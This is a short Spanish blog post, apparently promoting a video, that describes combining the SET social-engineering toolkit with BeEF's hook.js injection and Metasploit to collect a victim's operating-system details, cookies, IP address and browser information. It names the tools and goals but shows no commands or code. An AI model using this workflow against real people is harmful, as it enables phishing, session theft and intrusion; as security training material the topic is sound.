Consiste en el uso de SET, una de las herramientas de ingeniería social más potentes en el mundo de la ciberseguridad y el hacking.
También se usa la herramienta BeEF pudiendo mejorar el ataque de ingeniería social mediante la inyección del hook.js, y así usar el framework para usar exploits con la combinación de Metasploit, con el objetivo de obtener información del sistema operativo, cookies, direccionamiento IP, el cliente del navegador etc...

El uso de BeEF para realizar una fase de explotación en el sistema y recolección de información se verá en otros vídeos más adelante en el canal Rabbit Hutch.
Aún así tenemos una buena entrada en el blog sobre el uso de BeEF
Si quereís saber más información sobre este nuevo proyecto visitar la web de Rabbit Hutch

Proof of Concept


Un saludo, Naivenom

Google Analytics